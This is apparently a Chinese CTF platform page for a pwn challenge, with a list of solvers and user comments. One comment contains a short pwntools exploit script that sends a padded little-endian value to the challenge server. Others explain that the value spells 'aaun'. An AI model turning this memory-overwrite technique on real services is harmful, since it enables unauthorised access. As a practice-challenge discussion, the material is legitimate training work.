评分(0)
暂无评分
解题动态
xjuqwd 攻破了该题 8天前
Aerelin 攻破了该题 13天前
PWN尬的易烊干洗 攻破了该题 22天前
15511011321 攻破了该题 25天前
buzhidaowj 攻破了该题 27天前
Reforest2623 攻破了该题 1月前
startway 攻破了该题 2月前
杉一 攻破了该题 2月前
张云翔0 攻破了该题 2月前
无限老表 攻破了该题 3月前
1000x_ 攻破了该题 3月前
AioKT 攻破了该题 4月前
wsmemail 攻破了该题 4月前
Bernie 攻破了该题 4月前
GDLZDYW 攻破了该题 4月前
李欣 攻破了该题 4月前
A9D9BD2A9516280E 攻破了该题 5月前
chengyi666 攻破了该题 5月前
mmcode 攻破了该题 5月前
评论
怪我喽 1年前
举报
from pwn import* io = remote('82.157.146.43',15682) payload = b'A'*4+p64(1853186401) io.sendline(payload) io.interactive()
黑客小贺 1年前
举报
启动场景,然后放进Linux虚拟机里输入kkkkaaun
nil126 1年前
举报
@whoami12138 1853186401转换为16进制再转换为ascii就是nuaa,再考虑到小端序的存储方式将nuaa进行反转就是aaun,最后加上前面4个补位的字符就可以了。xxxxaaun
whoami12138 1年前
举报
大佬,原理是啥